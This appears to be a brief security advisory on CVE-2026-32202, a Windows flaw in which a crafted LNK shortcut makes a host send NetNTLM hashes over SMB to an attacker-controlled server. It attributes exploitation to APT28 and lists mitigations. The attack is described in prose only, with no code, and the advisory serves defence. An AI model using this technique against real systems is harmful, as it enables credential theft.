Microsoft patched this in the April 2026 Patch Tuesday cycle. CISA added CVE-2026-32202 to KEV on 2026-04-28 with a deadline of 2026-05-12. Threat intelligence attributes active exploitation to APT28 (GRU Unit 26165, "Fancy Bear") targeting EU government ministries. The technique complements APT28's documented use of NTLM relay and pass-the-hash for lateral movement within government networks.

Immediate actions: Apply April 2026 Windows Patch Tuesday; block outbound TCP 445 to non-business internet destinations at the perimeter firewall; enable "Restrict NTLM" Group Policy (set to "Deny all") or migrate authentication to Kerberos-only where operationally feasible; monitor EDR for outbound 445/TCP to internet IPs from workstations.

A crafted Windows Shell artefact (LNK shortcut) placed in a directory causes the victim host to initiate an outbound SMB authentication to an attacker-controlled server when the directory is opened, transmitting NetNTLM hashes. APT28 has weaponised this against EU government ministries. Despite the low NVD CVSS (4.3), KEV listing and state-actor ITW exploitation make this a priority-patch item. Apply April 2026 Windows cumulative updates. CISA KEV deadline: 2026-05-12.